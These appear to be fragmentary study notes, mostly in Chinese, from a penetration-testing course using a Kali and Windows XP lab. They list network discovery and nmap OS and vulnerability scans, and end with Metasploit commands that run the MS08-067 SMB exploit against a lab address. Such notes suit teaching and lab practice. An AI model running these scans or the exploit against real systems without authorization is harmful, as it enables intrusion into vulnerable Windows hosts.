         software→(App lication,system:os
系統平台→ Hardware→Secwrity
         Firmware→seulrity
           (BIOS)
[Kali] → [XP]  Penetration Test 滲透測試，駭客攻防  
  [VBOX]
[windows]   學習目標.安全防護
[PT] [攻]  → [防]                                             *Google hacking*
系統安全與滲透測試實戰
1.確認網段中有那些系統開啟(live)
netdiscover -r IP/24
2.確認某主機是否存在
ping 192.168.1.1 
3.確認OS作業系統:是甚麼版本?
 nmap -O 10.0.2.4
4.確認是否有漏洞?
網站https://nmap.org/nsedoc，cve。nmap -p445 --script smb-vuln-ms17-010，
5.Exploictation⟹6.post-Exploitation

powershell.windows
openvas[漏洞掃描]
漏洞:MS-08-067.MS-17-010
       [年]      [年]
(防)滲透測
1.連線?
2.________PID?PROCESS             CVE-2020-________
3.殺掉                          [Windows cve rdp]
登入漏洞
search 08_067
use exploit/windows/smb/ms08_067_netapi
> show options
> set RHOSTS 10.0.2.4
> run
